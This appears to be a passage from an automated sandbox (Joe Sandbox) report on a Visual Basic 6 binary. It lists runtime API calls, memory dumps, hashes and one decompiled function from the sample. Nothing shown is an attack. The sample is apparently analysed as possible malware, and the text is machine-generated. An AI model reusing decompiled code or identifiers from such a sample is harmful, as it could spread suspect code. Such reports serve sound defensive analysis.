__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000064), ref: 00454C7F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00454C93
__vbaObjSet.MSVBVM60(?,00000000), ref: 00454CAA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000060), ref: 00454CC7
__vbaObjSet.MSVBVM60(?,00000000), ref: 00454CDB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000110), ref: 00454D01
__vbaObjSet.MSVBVM60(?,00000000), ref: 00454D15
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000108), ref: 00454D3B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00454D4F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000110), ref: 00454D75
__vbaObjSet.MSVBVM60(?,00000000), ref: 00454D89
__vbaObjSet.MSVBVM60(?,?,00000000), ref: 00454ED5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000280), ref: 00454EF1
__vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 00454F11

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$FreeList$New2
String ID:
API String ID: 3286097656-0
Opcode ID: 54035865c9f315badc777aeca99fff5cebbf960fcfebd1a2d934679acb436a6c
Instruction ID: 51391cc867650fb954e7987f341b465c1ca7e936d649f229bf6abff1826f28f0
Opcode Fuzzy Hash: 54035865c9f315badc777aeca99fff5cebbf960fcfebd1a2d934679acb436a6c
Instruction Fuzzy Hash: 2EC11FB0A00209AFDB00DFA9C984BDEFBB8FF48300F14856AE549EB251D7749945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00454F80, Relevance: 27.3, APIs: 18, Instructions: 315
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00454F80(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				intOrPtr _v144;
				intOrPtr _v152;
				intOrPtr _v160;
				char _v168;
				signed char _v172;
				char _v176;
				intOrPtr* _v180;
				intOrPtr* _v188;
				signed int _v232;
				void* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				void* _t126;
				void* _t129;
				void* _t130;
				void* _t135;
				void* _t140;
				void* _t144;
				void* _t148;
				signed char _t151;
				intOrPtr* _t154;
				signed char _t170;
				void* _t173;
				char* _t175;
				intOrPtr _t179;
				intOrPtr* _t180;
				intOrPtr* _t181;
				intOrPtr* _t182;
				intOrPtr* _t183;
				void* _t184;
				intOrPtr _t205;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				intOrPtr* _t224;
				intOrPtr* _t225;
				intOrPtr* _t226;
				intOrPtr* _t231;
				signed int _t233;
				signed int _t234;
				signed char _t235;
				void* _t236;
				void* _t238;
				intOrPtr _t239;
				intOrPtr _t240;
				void* _t241;
				intOrPtr* _t242;
				intOrPtr* _t243;
				intOrPtr* _t244;
				intOrPtr* _t245;
				intOrPtr* _t246;
				intOrPtr* _t247;
				intOrPtr* _t248;
				intOrPtr _t253;

				_t239 = _t238 - 0xc;
				 *[fs:0x0] = _t239;
				_t240 = _t239 - 0xd4;
				_v16 = _t240;
				_v12 = 0x401650;
				_t233 = _a4;
				_v8 = _t233 & 0x00000001;
				_t234 = _t233 & 0xfffffffe;
				_a4 = _t234;
				 *((intOrPtr*)( *_t234 + 4))(_t234, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t236);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v168 = 0;
				_v172 = 0;
				_v176 = 0;
				E00461600(0, __edi, _t234);
				_t121 =  *((intOrPtr*)( *_t234 + 0x328))(_t234);
				_t231 = __imp____vbaObjSet;
				_t123 =  *_t231( &_v40, _t121);
				_v188 = _t123;
				_t125 =  *_t231( &_v28,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				_v180 = _t125;
				_t126 =  *((intOrPtr*)( *_t125 + 0x188))(_t125,  &_v32);
				asm("fclex");
				if(_t126 < 0) {
					__imp____vbaHresultCheckObj(__eax, _v180, 0x40937c, 0x188);
				}
				_v32 = 0;
				_t129 =  *_t231( &_v36, _v32);
				_t179 = _v188;
				_t130 =  *((intOrPtr*)( *_v188 + 0x64))(_t179, _t129);
				asm("fclex");
				if(_t130 < 0) {
					__imp____vbaHresultCheckObj(_t130, _t179, 0x40937c, 0x64);
				}
				__imp____vbaFreeObjList(3,  &_v28,  &_v36,  &_v40);
				_t241 = _t240 + 0x10;
				_t180 =  *_t231( &_v28,  *((intOrPtr*)( *_t234 + 0x328))(_t234));
				_t135 =  *((intOrPtr*)( *_t180 + 0x60))(_t180,  &_v32);
				asm("fclex");
				if(_t135 < 0) {
					__imp____vbaHresultCheckObj(_t135, _t180, 0x40937c, 0x60);
				}
				_t181 =  *_t231( &_v36,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				_t140 =  *((intOrPtr*)( *_t181 + 0x108))(_t181,  &_v168);
				asm("fclex");
				if(_t140 < 0) {
					__imp____vbaHresultCheckObj(_t140, _t181, 0x40937c, 0x108);
				}
				_t182 =  *_t231( &_v40,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				_t144 =  *((intOrPtr*)( *_t182 + 0x108))(_t182,  &_v172);
				asm("fclex");
				if(_t144 < 0) {
					__imp____vbaHresultCheckObj(_t144, _t182, 0x40937c, 0x108);
				}
				_t183 =  *_t231( &_v44,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				_t148 =  *((intOrPtr*)( *_t183 + 0x110))(_t183,  &_v176);
				asm("fclex");
				if(_t148 < 0) {
					__imp____vbaHresultCheckObj(_t148, _t183, 0x40937c, 0x110);
				}
				_t151 =  *_t231( &_v52,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				asm("fchs");
				_t235 = _t151;
				_v60 = _v172;
				asm("fnstsw ax");
				if((_t151 & 0x0000000d) == 0) {
					_t242 = _t241 - 0x10;
					_v232 = _v32;
					_t154 = _t242;
					_t243 = _t242 - 0x10;
					 *_t154 = 3;
					_v100 = 0xa;
					_v92 = 0x80020004;
					 *((intOrPtr*)(_t154 + 4)) = _v160;
					_t221 = _t243;
					_t244 = _t243 - 0x10;
					_v32 = 0;
					 *((intOrPtr*)(_t154 + 8)) = 0xcc0020;
					_t184 =  *_t235;
					_v68 = 4;
					 *((intOrPtr*)(_t154 + 0xc)) = _v152;
					 *_t221 = 0xa;
					 *((intOrPtr*)(_t221 + 4)) = _v144;
					 *((intOrPtr*)(_t221 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t221 + 0xc)) = _v136;
					_t222 = _t244;
					_t245 = _t244 - 0x10;
					 *_t222 = 0xa;
					 *((intOrPtr*)(_t222 + 4)) = _v128;
					 *((intOrPtr*)(_t222 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t222 + 0xc)) = _v120;
					_t223 = _t245;
					_t246 = _t245 - 0x10;
					 *_t223 = 0xa;
					 *((intOrPtr*)(_t223 + 4)) = _v112;
					 *((intOrPtr*)(_t223 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t223 + 0xc)) = _v104;
					_t224 = _t246;
					_t247 = _t246 - 0x10;
					 *_t224 = _v100;
					 *((intOrPtr*)(_t224 + 4)) = _v96;
					 *((intOrPtr*)(_t224 + 8)) = _v92;
					 *((intOrPtr*)(_t224 + 0xc)) = _v88;
					_t225 = _t247;
					 *_t225 = 4;
					 *((intOrPtr*)(_t225 + 4)) = _v80;
					 *((intOrPtr*)(_t225 + 8)) = _v176;
					 *((intOrPtr*)(_t225 + 0xc)) = _v72;
					_t248 = _t247 - 0x10;
					_t253 = _v168 -  *0x401638;
					_t226 = _t248;
					_push(0);
					 *_t226 = _v68;
					_t170 = _v60;
					 *((intOrPtr*)(_t226 + 4)) = _v64;
					_t205 = _v56;
					_push(_t205);
					 *(_t226 + 8) = _t170;
					asm("fnstsw ax");
					if((_t170 & 0x0000000d) != 0) {
						goto L19;
					}
					 *((intOrPtr*)(_t226 + 0xc)) = _t205;
					 *_t248 = _t253;
					_t173 =  *((intOrPtr*)(_t184 + 0x280))(_t235,  *_t231( &_v48, _v232));
					asm("fclex");
					if(_t173 < 0) {
						__imp____vbaHresultCheckObj(_t173, _t235, 0x40937c, 0x280);
					}
					_t175 =  &_v28;
					__imp____vbaFreeObjList(6, _t175,  &_v36,  &_v40,  &_v44,  &_v48,  &_v52);
					_v8 = 0;
					asm("wait");
					_push(0x455352);
					return _t175;
				}
				return __imp____vbaFPException();
			}

0x00454f83
0x00454f92
0x00454f99
0x00454fa2
0x00454fa5
0x00454fac
0x00454fb4
0x00454fb7
0x00454fbb
0x00454fc0
0x00454fc5
0x00454fc8
0x00454fcb
0x00454fce
0x00454fd1
0x00454fd4
0x00454fd7
0x00454fda
0x00454fe0
0x00454fe6
0x00454fec
0x00454ff4
0x00454ffa
0x00455005
0x0045500a
0x0045501b
0x00455024
0x0045502a
0x00455032
0x00455034
0x00455048
0x00455048
0x0045505b
0x00455061
0x00455065
0x0045506d
0x00455072
0x00455074
0x0045507f
0x0045507f
0x00455093
0x0045509b
0x004550ac
0x004550b5
0x004550ba
0x004550bc
0x004550c7
0x004550c7
0x004550dd
0x004550e9
0x004550f1
0x004550f3
0x00455101
0x00455101
0x00455117
0x00455123
0x0045512b
0x0045512d
0x0045513b
0x0045513b
0x00455151
0x0045515d
0x00455165
0x00455167
0x00455175
0x00455175
0x00455189
0x00455191
0x00455193
0x0045519a
0x0045519d
0x004551a1
0x004551aa
0x004551ad
0x004551b3
0x004551ba
0x004551bd
0x004551c5
0x004551cc
0x004551d3
0x004551d6
0x004551d8
0x004551db
0x004551e2
0x004551eb
0x004551ed
0x004551f4
0x00455202
0x0045520a
0x00455212
0x0045521a
0x0045521d
0x00455222
0x00455225
0x0045522a
0x00455232
0x0045523a
0x0045523d
0x00455242
0x00455245
0x0045524a
0x00455252
0x00455258
0x0045525e
0x00455260
0x00455263
0x00455268
0x0045526e
0x00455276
0x00455279
0x0045527e
0x00455283
0x0045528c
0x0045528f
0x0045529e
0x004552a1
0x004552a7
0x004552a9
0x004552ab
0x004552ad
0x004552b0
0x004552b3
0x004552b6
0x004552b7
0x004552ba
0x004552be
0x00000000
0x00000000
0x004552c4
0x004552cd
0x004552d9
0x004552e1
0x004552e3
0x004552f1
0x004552f1
0x0045530a
0x00455311
0x0045531a
0x00455321
0x00455322
0x00000000
0x00455322
0x00401e9c

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00455005
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045501B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000188), ref: 00455048
__vbaObjSet.MSVBVM60(?,?), ref: 00455061
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000064), ref: 0045507F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00455093
__vbaObjSet.MSVBVM60(?,00000000), ref: 004550AA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000060), ref: 004550C7
__vbaObjSet.MSVBVM60(?,00000000), ref: 004550DB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000108), ref: 00455101
__vbaObjSet.MSVBVM60(?,00000000), ref: 00455115
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000108), ref: 0045513B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045514F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000110), ref: 00455175
__vbaObjSet.MSVBVM60(?,00000000), ref: 00455189
__vbaObjSet.MSVBVM60(?,?,?,00000000), ref: 004552D5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000280), ref: 004552F1
__vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 00455311

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$FreeList$New2
String ID:
API String ID: 3286097656-0
Opcode ID: 8e731a8afc3816ce556ffc2d9d3d25f1ec6cb5a20aa9ede427c72bf2ab14a26a
Instruction ID: 112c91f32195ef66a4a3a08a3f7bc959603fc00a5464196dc0781af0144ff962
Opcode Fuzzy Hash: 8e731a8afc3816ce556ffc2d9d3d25f1ec6cb5a20aa9ede427c72bf2ab14a26a
Instruction Fuzzy Hash: 43C110B0A00209EFDB00DFA9C984BAEFBB8FF49300F14856AE549E7291D7749945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00452C90, Relevance: 27.2, APIs: 18, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00452D33
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00452D5A
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00452D79
__vbaFreeObj.MSVBVM60 ref: 00452D88
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452E09
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00452E30
#588.MSVBVM60(00000000,00000000,00000000), ref: 00452E4D
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 00452E6B
__vbaFreeObj.MSVBVM60 ref: 00452E74
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452EDF
__vbaLateIdSt.MSVBVM60(00000000), ref: 00452EE6
__vbaFreeObj.MSVBVM60 ref: 00452EEF
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452F17
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00452F3A
__vbaFreeObj.MSVBVM60 ref: 00452F43
__vbaObjSet.MSVBVM60(?,00000000), ref: 00452F72
__vbaLateIdSt.MSVBVM60(00000000), ref: 00452F79
__vbaFreeObj.MSVBVM60 ref: 00452F82

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorLateNew2System$#588List
String ID:
API String ID: 2526873969-0
Opcode ID: ce52bc9526adc561983ddd2d2f8661e64231891371c7894b40731798f20e5943
Instruction ID: 06ff312d95cb9cd4949e77d205cf04bfb382f2c5bd73e6813adbca75299f0570
Opcode Fuzzy Hash: ce52bc9526adc561983ddd2d2f8661e64231891371c7894b40731798f20e5943
Instruction Fuzzy Hash: 89918070A00205DFDB04DFA5DD84ABABBB9FF49701F10813AE545E72A1EB749845CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0045A150, Relevance: 27.2, APIs: 18, Instructions: 191COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045A1BF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000084), ref: 0045A1E4
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045A1ED
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A201
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000008C), ref: 0045A226
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045A22F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A243
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000084), ref: 0045A268
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045A271
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A285
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000008C), ref: 0045A2AA
__vbaFreeObj.MSVBVM60 ref: 0045A2B3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A2C7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045A2D9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188), ref: 0045A2FC
__vbaObjSet.MSVBVM60(?,?), ref: 0045A313
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 0045A329
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0045A33D

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$Free$List
String ID:
API String ID: 3690971433-0
Opcode ID: 765faa028aa2dd0ac94c5c4b16b74c8dd67bf030266b180657c676ecd94fa6e8
Instruction ID: 786768c2bc0808da808b2c2cac80cb58787883fac9765b3cfd090cd5c4d9fdb9
Opcode Fuzzy Hash: 765faa028aa2dd0ac94c5c4b16b74c8dd67bf030266b180657c676ecd94fa6e8
Instruction Fuzzy Hash: FC613D70600205AFDB00EFA4CD89EABBBBCFF08705F104669F941E72A1DB7499458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00454260, Relevance: 27.2, APIs: 18, Instructions: 161COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004542BB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000012C), ref: 004542DC
__vbaFreeObj.MSVBVM60 ref: 004542E5
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004542F9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00454314
__vbaFreeObj.MSVBVM60 ref: 0045431D
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00454331
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 0045434C
__vbaFreeObj.MSVBVM60 ref: 00454355
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00454369
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00454384
__vbaFreeObj.MSVBVM60 ref: 0045438D
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004543A1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004543BC
__vbaFreeObj.MSVBVM60 ref: 004543CB
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004543DB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004543F6
__vbaFreeObj.MSVBVM60 ref: 004543FF

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: 190fbbfbf3181f60bc32b09bad59638082718cb4e14fd57753a22c9d033ec1f3
Instruction ID: 381b8acbb9c17e2446e2e7f159489a4013ab666e64c50fef21825c5cb1fbe0ff
Opcode Fuzzy Hash: 190fbbfbf3181f60bc32b09bad59638082718cb4e14fd57753a22c9d033ec1f3
Instruction Fuzzy Hash: F0512C71600205ABD710ABA5CD49FAFBBBCFF49705F204129F542E71E1CA7499468AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00453CC0, Relevance: 27.2, APIs: 18, Instructions: 161COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453D1B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000012C), ref: 00453D3C
__vbaFreeObj.MSVBVM60 ref: 00453D45
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453D59
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453D74
__vbaFreeObj.MSVBVM60 ref: 00453D7D
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453D91
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453DAC
__vbaFreeObj.MSVBVM60 ref: 00453DB5
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453DC9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453DE4
__vbaFreeObj.MSVBVM60 ref: 00453DED
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453E01
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453E1C
__vbaFreeObj.MSVBVM60 ref: 00453E2B
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453E3B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453E56
__vbaFreeObj.MSVBVM60 ref: 00453E5F

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: 1727ec8a618c5987320ff0b78aca574af07de9f7268ccf27738b4101efaa6f48
Instruction ID: 0dc6bfd184133994a5fa993408c1096d2090380e56c474a0246058e3ba79549c
Opcode Fuzzy Hash: 1727ec8a618c5987320ff0b78aca574af07de9f7268ccf27738b4101efaa6f48
Instruction Fuzzy Hash: 22512E71600205ABD710AF65CD49FAFBBBCFF49701F104129F542E72E1CB7499468AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00453AE0, Relevance: 27.2, APIs: 18, Instructions: 161COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453B3B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000012C), ref: 00453B5C
__vbaFreeObj.MSVBVM60 ref: 00453B65
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453B79
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453B94
__vbaFreeObj.MSVBVM60 ref: 00453B9D
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453BB1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453BCC
__vbaFreeObj.MSVBVM60 ref: 00453BD5
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453BE9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453C04
__vbaFreeObj.MSVBVM60 ref: 00453C0D
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453C21
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453C3C
__vbaFreeObj.MSVBVM60 ref: 00453C4B
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453C5B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453C76
__vbaFreeObj.MSVBVM60 ref: 00453C7F

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
